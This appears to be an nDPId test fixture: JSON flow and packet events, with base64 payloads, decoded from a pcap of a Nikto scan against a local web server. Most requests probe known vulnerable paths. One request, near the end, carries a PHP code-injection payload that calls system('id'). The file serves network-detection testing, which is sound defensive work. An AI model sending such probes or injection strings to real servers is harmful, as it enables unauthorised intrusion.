+01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 